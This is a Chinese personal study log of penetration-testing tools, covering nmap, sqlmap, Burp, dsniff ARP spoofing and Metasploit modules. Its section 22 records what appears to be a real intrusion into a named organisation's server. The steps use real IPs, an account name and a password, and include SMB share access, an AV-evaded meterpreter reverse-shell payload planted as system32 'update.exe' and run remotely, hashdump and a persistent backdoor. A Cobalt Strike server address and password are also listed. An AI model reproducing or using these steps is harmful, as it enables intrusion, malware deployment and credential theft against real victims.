渗透工具学习

下面是我学习渗透时的工具学习：

1 httrack  可以拷贝网站  做挂马 等工具使用

kali 上 安装它，然后创建目录  myweb  登陆上去  httack 输入网站名 可以定制抓什么文件，然后就拷贝成功了

2 nmap 很强大  

#nmap 192.168.1.1/24 扫描整个子网段

扫描多个目标,命令如下：
#nmap 192.168.1.2 192.168.1.5

扫描一个范围内的目标,如下：
#nmap 192.168.1.1-100 //(扫描IP地址为192.168.1.1-192.168.1.100内的所有主机)

#nmap -sS 192.168.1.1 //如果Nmap命令中没有指出扫描类型,默认的就是Tcp SYN.但是它需要root/administrator权限.

#nmap -sT 192.168.1.1 //如果不选择SYN扫描,TCP connect()扫描就是默认的扫描模式.不同于Tcp SYN扫描,Tcp connect()扫描需要完成三次握手,并且要求调用系统的connect().Tcp connect()扫描技术只适用于找出TCP和UDP端口.

nmap -sF 192.168.1.8  //FIN扫描也不会在目标主机上创建日志(FIN扫描的优势之一).个类型的扫描都是具有差异性的,FIN扫描发送的包只包含FIN标识,NULL扫描不发送数据包上的任何字节,XMAS扫描发送FIN、PSH和URG标识的数据包.

# nmap -O -PN 192.168.1.1/24 //如果远程主机有防火墙，IDS和IPS系统，你可以使用-PN命令来确保不ping远程主机，因为有时候防火墙会组织掉ping请求.-PN命令告诉Nmap不用ping远程主机。
# nmap -O --osscan-guess 192.168.1.1 //想好通过Nmap准确的检测到远程操作系统是比较困难的，需要使用到Nmap的猜测功能选项, –osscan-guess 猜测认为最接近目标的匹配操作系统类型。

Nmap's操作系统的检测是很准确也是很有效的，举例：使用系统Solaris 2.7带有SYN扫描的指纹验证堆栈。 
# nmap -sS -O 192.168.7.12 

-v: Increase verbosity level (use -vv or more for greater effect)

nmap -P 80,443,8080 -P0 -sV x.x.x.0/24 -T5  这个是扫描整个网段内的 服务

OUTPUT:
  -oN/-oX/-oS/-oG <file>: Output scan in normal, XML, s|<rIpt kIddi3

HOST DISCOVERY:

  -n/-R: Never do DNS resolution/Always resolve [default: sometimes] 不做DNS解析/总是做

nmap -n -oX my.xml 182.18.152.0/24

db_import my.xml

hosts

[*] Nmap: -A: Enable OS detection, version detection, script scanning, and traceroute

msf 中 db_nmap  -n -A xxx.com

db_nmap -n -A 182.18.152.8

3  dig  ip    //Dig (domain information groper) is one the most popular and widely used DNS

DIG（域信息搜索器）是一种最流行和广泛使用的DNS
侦察工具。它会查询DNS服务器。  dig -t    选项将委派DNS区域使用授权名称

root@bt:/opt/metasploit/msf3# dig -t ns www.baidu.com;; QUESTION SECTION:;www.baidu.com.INNS;; ANSWER SECTION:www.baidu.com.5INCNAMEwww.a.shifen.com.;; AUTHORITY SECTION:a.shifen.com.5INSOAns1.a.shifen.com. baidu_dns_master.baidu.com. 1409040001 5 5 86400 3600

baidu_dns_master.baidu.com  DNS服务器域名

4 Maltego
讲信息收集就不得不说Maltego。Maltego应用于收集包括：域名、DNS名whios信息、ip地址等网络数据及通过公司或组织名称、邮件地址、网站、社区网络（facebook等）、电话号码收集关于个人的信息。可谓是社工利器。

注册页面 ： http://www.paterva.com/redirect/m3ceregister.html

5   Arping

由于防火墙的使用等原因，部分主机会出现ping不通的状况。Arping通过发送Arp request的方式进行测试（直连网络），确定一个特定的ip在线。
直接在终端中输入命令使用。
基本命令格式：arping -c 3 192.168.1.1
参数解释：-c 3  发送的Arp请求包的数量
192.168.1.1  目标地址
如果主机在线，则返回相应的包，反之则提示丢包。

6  Genlist
genlist可以快速的扫描ip段内的存活主机，而且结果呈列表式，因此与fping相比，更简洁明了。
通过直接在终端内运行命令使用。
基本命令：genlist -s 192.168.1.*
参数解释：-s 192.168.1.*    目标ip段

7  Nbtscan

nbtscan是一个扫描网段内微软主机netbios信息的工具，只适用于局域网，可以显示ip，主机名，用户名及mac地址等。速度较快。

通过直接在终端内运行命令使用。

基本命令：nbtscan 192.168.1.1-255

8 Zenmap 

9 IPv4/IPv6网络安全测试工具—Evil Foca (Alpha版)

下载地址： http://www.freebuf.com/tools/8397.html

安装不成功   提示不行~_~ 不知道为什么

10 Webshag
Webshag是一个多线程，用于审核Web服务器的多平台工具。

来到选项卡：spider·  输入目标网址 之后点击 确定会得到一些与这个  域名相关的邮箱帐号  和  网站内部路径  和  这个域名相关的外部链接

11 Skipfsh

Skipfsh是一个Web应用程序安全侦测工具。Skipfsh的准备
互动地图使用递归抓取和基于字典的探头目标。
生成的地图被扫描的安全检查后，提供输出。

下载  https://code.google.com/p/skipfish/

make all 编译  所有  得到软件

请注意，当使用默认skipfish字典将不运行
-S 命令。您可以复制一个默认的词库

-o 输出命令

最后可以从html中 查看  扫描到的东西

./skipfish -o log -S /pentest/web/skipfish/dictionaries/complete.wl   http://sebug.net

12 Which

可以查询 软件安装目录  可以去找到 软件目录了

which指令会在PATH变量指定的路径中，搜索某个系统命令的位置，并且返回第一个搜索结果

cd 这个常用的命令竟然找不到啊！为什么呢？这是因为 cd 是bash 内建的命令！ 但是 which 默认是找 PATH 内所规范的目录

13 Websploit is an open source project used to scan and analyze remote systems to find vulnerabilities.

show modules

show options

use xxxx

set xxxxx

run

14

14 

w3af（简称Web应用程序攻击和审计框架）是一个开放源代码的

Web应用程序安全扫描仪和开发工具。W3af可以根据访问

Web应用程序评估|网络漏洞扫描器通过选择w3af。

15 sqlmap

一个常见的​​功能块。关键字会有的SqlMap得到数据库。
的SqlMap -u http://www.drchaous.com/article.php?id=5 --dbs //扫出test 数据库

sqlmap –u http://www.drchaos.com/article.php?id=5 -D test--tables

sqlmap -u http://www.drchaous.com/article.php?id=5 -T xxxtablesnameherexxx --columns

sqlmap -u http://www.drchaous.com/article.php?id=5 -T xxx tablesnameherexxx -U

sqlmap -u http://www.drchaous.com/article.php?id=5 -T xxxtablesnameherexxx -U xxxtestxxx --dump

16 linux  find  + locate命令学习

find / -name "dsniff"  可以查到 它的目录，但不能查到 dsniff.service

locate xxx 可以直接查到  文件名称相关的文件

17 burpsuit 

xp 下是pro版本，kali 是限制版本的

1) spider 可以扫描目录 针对 * 文件扫

2）scanner  漏洞扫描，可以由spider 中 选择active scan 主动扫描进行,设置30个线程去扫 很强大

3） intruder  字典破解~_~ clear  $ 然后 add $  然后选择字典  注意 有很多自定义字典  还能够修改传输包

4) repeater  手工检测等

5） decoder 编码工具  很有用啊~_~  

6)  comparer 比较工具   两次的截取抓包  发送到comparer 就可以比较了

18  dsniff 工具学习

先用 nmap 扫一下内网有哪些主机 nmap -sS x.x.x.1-255

扫描针对某IP进行攻击

其一，首先打开本机的路由转发功能
操作：echo "1" > /proc/sys/net/ipv4/ip_forward
第二:
#arpspoof -t 网关的IP 受攻击者的IP
第三：打开另一个终端执行
#dsniff -c -f /usr/loca/lib/dsniff.service
到现在这个份上基本上它已经可以工作了
你可以在本机上试验一下

扫描百度账号 只能错误的才截取到，正确的不可以截取，看来百度还做的不错啊~_~

另外一种设置：

使用 A 嗅探 B 的FTP、http登录密码
1. 使用 arpspoof 对目标机实施ARP欺骗攻击
# arpspoof -i eth0 -t 192.168.0.125 192.168.0.1
2. 使用 dsniff 取得指定端口的数据信息
# dsniff -i eth0 -t 21/tcp=ftp,80/tcp=http
Dsniff支持的协议类型包括：
FTP，Telnet，SMTP，HTTP，POP，NNTP，IMAP，SNMP，LDAP，Rlogin，RIP，OSP
F，PPTP，MS-CHAP，NFS，VRRP，YP/NIS，SOCKS，X11，CVS，IRC，AIM，ICQ，Napster，ostgreSQL，Meeting Maker，Citrix ICA，Symantec，pcAnywhere，NA
I Sniffer，Microsoft SMB，Oracle QL*Net，Sybase及Microsoft SQL认证信息

FTP等的可以扫    ,phpmyadmin

 

更深入了解： http://viewer.ubnt.com.cn/web/viewer.php?aid=NDY4OHw1Yjg0N2I2MHwxNDEwNzg2NzY5fDB8NTY2OQ%3D%3D

纯粹被动地进行网络活动监视的工具，包括：dsniff、filesnarf、mailsnarf 、msgsnarf、urlsnarf、webspy

19  Firefox插件

1）  Fiddler web debugger 工具  

Fiddler是最强大最好用的Web调试工具之一，它能记录所有客户端和服务器的http和https请求，允许你监视，设置断点，甚至修改输入输出数据. 使用Fiddler无论对开发还是测试来说，都有很大的帮助。

学习文章 ： Fiddler 教程

bpu http://xxx.com   和 bpafter http://xxx.com

Fiddler 浏览器代理神器,拦截请求或响应抓包,重放,模拟请求,编码解码,三方扩展Watcher-Web前端安全的自动审计工具

2） Firebug-抓包与各种调试

3） amper Data-拦截修改

4） Live Http Header-重放功能

5）Hackbar-编码解码/POST提交

6） Modify Headers-修改头部

20 PengQ  一款集成浏览器 

125.17.137.7   下载  两个 jnlp文件，然后vim 之  发现codebase 为

 htt[://xxxxx:443/SGPAdmin

wget --no=check-certificate htt[://125.17.137.7:443/SGPAdmin/三个文件

分析  jar 看到 userRequest , fileRequest 然后搜查，查看构造包

ZDI  看到pape 描述  分析jar  发现构造cmd 和query就可以执行exe程序

https://www.veil-framework.com/framework/veil-evasion/   bypass virs

Veil-Evasion is a tool designed to generate metasploit payloads that bypass common anti-virus solutions.

apt-get install veil-evasion  等很久

21） kaili 更新源

vim /etc/apt/sources.list

google kali default sources list

apt-get update

apt-get upgrade 

apt-get dist-upgrade

22

cobaltStrike     

191.101.11.58

2014

iC4quohcTz@m

生成Windows  meterpreter 32

msfpayload windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> X > shell.exe

轻型目录访问协议（英文：Lightweight Directory Access Protocol，縮寫：LDAP）是一个访问在线目录服务的协议

shelldap  登录  一个IP  

ldap(LDAP是轻量目录访问协议) Ananymous bind ok->shelldap(ldap查看工具):shelldap --server 220.227.131.170

cat *

ssh laxmiram.ranaxxx@220.227.131.170xxx

arp -a：查看和本机连接过的内网机子（ip、mac）

findsmb：查看内网中有smb服务的windos机子

arp -a 看到很多主机

net rpc info

net rpc info -S ERPTESTSERVER：查看ERPTESTSERVER这台机子所在的域

net rpc user -S ERPTESTSERVER：查看ERPTESTSERVER的用户

net rpc group -S ERPTESTSERVER：查看ERPTESTSERVER的用户组

net rpc group members Administrators -S ERPTESTSERVER：查看ERPTESTSERVER的管理员成员和域

smbclient -U JINDALPOWER域名\\root域帐号  \\\\ERPTESTSERVER计算机名\\c\$

smb: \Program Files\> ls

ssh -L 445:10.108.33.171:445 laxmiram.rana@220.227.131.170：把这台ERPTESTSERVER的445端口转发到本地来(本地输入)

msfpayload windows/meterpreter/reverse_tcp LHOST=106.185.42.58xxx LPORT=443 | msfencode -e x86/countdown -c 2 -t raw | msfencode -t exe -e x86/shikata_ga_nai -c 2 > /root/Desktop/enc.exe：生成一个payload

smbclient  -U JINDALPOWER\\root  \\\\127.0.0.1\\c\$：然后在本地连接smbclient，登上ERPTESTSERVER的c盘

smb:\>put /root/Desktop/enc.exe \windows\system32\update.exe:将payload拷贝到ERPTESTSERVER的system32目录下，但是我们进去看，没有update.exe这个文件，说明payload被杀了，但是我们在c盘都没有看见转杀毒软件，所以就猜测它的系统不是在c盘

smbclient -U JINDALPOWER\\root  \\\\127.0.0.1\\d\$:同样的方法登录ERPTESTSERVER的d盘，发现有McAfee

veil-evasion：对我们的payload做免杀，选用natave\Hrperion，生成的文件在/root/veil-output/compiled/update.exe

smb:\>put /root/veil-output/compiled/update.exe \windows\system32\update.exe:把我们的payload put到这个文件夹

winexe -U JINDALPOWER/root%jplldap //127.0.0.1 d:\\windows\\system\\update.exe:远程执行我们的payload(有的目录可能没权限，多试几个目录)

hashdump

wmis  (linux 下也可以执行远程Windows 的EXE)

Example: wmis -U [domain/]adminuser%password //host cmd.exe /c dir c:\ > c:\windows\temp\output.txt

用 cobaltstrile  生成  becon  listener   然后 生成 payload  丢进 veil  中  然后加密  

peexec(windows 下执行远程windows exe)

上传文件evil-e上去

生成  VBS自动变成EXE 的 RB文件

microsoft cabarc download

execute -f cmd.exe -i  打开cmd命令框

meterpreter persistent backdoor

http://pentestlab.wordpress.com/2012/03/17/metasploit-persistent-backdoor/

23) 转发端口

端口转发一定要在一开始  全部设置 后面设置的不得行～～～

linux 转发端口：

必须   三台机子

本机在内网， 外网反弹连接回来 需要转发端口 

在第二台机子上 敲命令

 ssh  -R 远程主机port: 本机IP:本机port   远程IP@密码

eg: ssh -R 1234:192.168.38.35:443 root@106.185.37.165 

目标机在内网，我想连过去 我连到 目标机的外网，目标机的外网又可以连接目标机的内网

ssh -L 本机port:目标主机IP：目标端口 host3 

本地端口转发假定host1是本地主机，host2是远程主机。由于种种原因，这两台主机之间无法连通。但是，另外还有一台host3，可以同时连通前面两台主机。因此，很自然的想法就是，通过host3，将host1连上host2。$ ssh -L 2121:host2:21 host3命令中的L参数一共接受三个值，分别是"本地端口:目标主机:目标主机端口"，它们之间用冒号分隔。这条命令的意思，就是指定SSH绑定本地端口2121，然后指定host3将所有的数据，转发到目标主机host2的21端口（假定host2运行FTP，默认端口为21）。这样一来，我们只要连接host1的2121端口，就等于连上了host2的21端口"本地端口转发"使得host1和host3之间仿佛形成一个数据传输的秘密隧道，因此又被称为"SSH隧道"。$ ssh -L 5900:localhost:5900 host3它表示将本机的5900端口绑定host3的5900端口（这里的localhost指的是host3，因为目标主机是相对host3而言的）。$ ssh -L 9001:host2:22 host3这时，只要ssh登录本机的9001端口，就相当于登录host2了。远程端口转发既然"本地端口转发"是指绑定本地端口的转发，那么"远程端口转发"（remote forwarding）当然是指绑定远程端口的转发。host1与host2之间无法连通，必须借助host3转发。但是，特殊情况出现了，host3是一台内网机器，它可以连接外网的host1，但是反过来就不行，外网的host1连不上内网的host3解决办法是，既然host3可以连host1，那么就从host3上建立与host1的SSH连接，然后在host1上使用这条连接就可以了。在host3执行下面的命令：$ ssh -R 2121:host2:21 host1分别是"远程主机端口:目标主机:目标主机端口"。就是让host1监听它自己的2121端口，然后将所有数据经由host3，转发到host2的21端口。由于对于host3来说，host1是远程主机，所以这种情况就被称为"远程端口绑定"。绑定之后，我们在host1就可以连接host2了："远程端口转发"的前提条件是，host1和host3两台主机都有sshD和ssh客户端。

23) 设置kali terminal 快捷键

设置 shortcuts 为 

NAME:         Terminal

Command:   gnome-terminal

然后设置 alt+t

24）内网用到的  expoit

端口扫描auxiliary/scanner/portscanscanner/portscan/ack        ACK防火墙扫描scanner/portscan/ftpbounce  FTP跳端口扫描scanner/portscan/syn        SYN端口扫描scanner/portscan/tcp        TCP端口扫描scanner/portscan/xmas       TCP”XMas”端口扫描smb扫描smb枚举auxiliary/scanner/smb/smb_enumusers返回DCERPC信息auxiliary/scanner/smb/pipe_dcerpc_auditor扫描SMB2协议auxiliary/scanner/smb/smb2扫描smb共享文件auxiliary/scanner/smb/smb_enumshares枚举系统上的用户auxiliary/scanner/smb/smb_enumusersSMB登录auxiliary/scanner/smb/smb_loginSMB登录use windows/smb/psexec(通过md5值登录)扫描组的用户auxiliary/scanner/smb/smb_lookupsid扫描系统版本auxiliary/scanner/smb/smb_versionmssql扫描(端口tcp1433udp1434)admin/mssql/mssql_enum     MSSQL枚举admin/mssql/mssql_exec     MSSQL执行命令admin/mssql/mssql_sql      MSSQL查询scanner/mssql/mssql_login  MSSQL登陆工具scanner/mssql/mssql_ping   测试MSSQL的存在和信息另外还有一个mssql_payload的模块 利用使用的smtp扫描smtp枚举auxiliary/scanner/smtp/smtp_enum扫描smtp版本auxiliary/scanner/smtp/smtp_versionsnmp扫描通过snmp扫描设备auxiliary/scanner/snmp/communityssh扫描ssh登录auxiliary/scanner/ssh/ssh_loginssh公共密钥认证登录auxiliary/scanner/ssh/ssh_login_pubkey扫描ssh版本测试auxiliary/scanner/ssh/ssh_versiontelnet扫描telnet登录auxiliary/scanner/telnet/telnet_login扫描telnet版本auxiliary/scanner/telnet/telnet_versiontftp扫描扫描tftp的文件auxiliary/scanner/tftp/tftpbruteftp版本扫描scanner/ftp/anonymousARP扫描auxiliary/scanner/discovery/arp_sweep扫描UDP服务的主机auxiliary/scanner/discovery/udp_probe检测常用的UDP服务auxiliary/scanner/discovery/udp_sweepsniffer密码auxiliary/sniffer/psnufflesnmp扫描scanner/snmp/communityvnc扫描无认证扫描scanner/vnc/vnc_none_auth